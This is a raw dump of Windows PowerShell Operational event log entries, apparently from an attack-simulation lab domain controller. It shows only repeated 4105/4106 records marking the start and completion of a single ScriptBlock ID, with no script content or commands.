Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474730
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474729
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474728
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474727
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474726
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474725
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474724
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474723
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474722
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474721
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474720
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474719
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474718
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474717
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474716
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474715
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474714
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474713
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474712
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474711
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474710
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474709
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474708
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474707
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474706
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474705
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474704
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474703
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474702
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474701
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474700
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474699
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474698
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474697
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474696
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474695
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474694
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474693
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474692
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474691
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474690
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474689
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474688
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474687
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474686
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474685
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474684
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474683
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474682
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474681
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474680
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474679
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474678
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474677
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
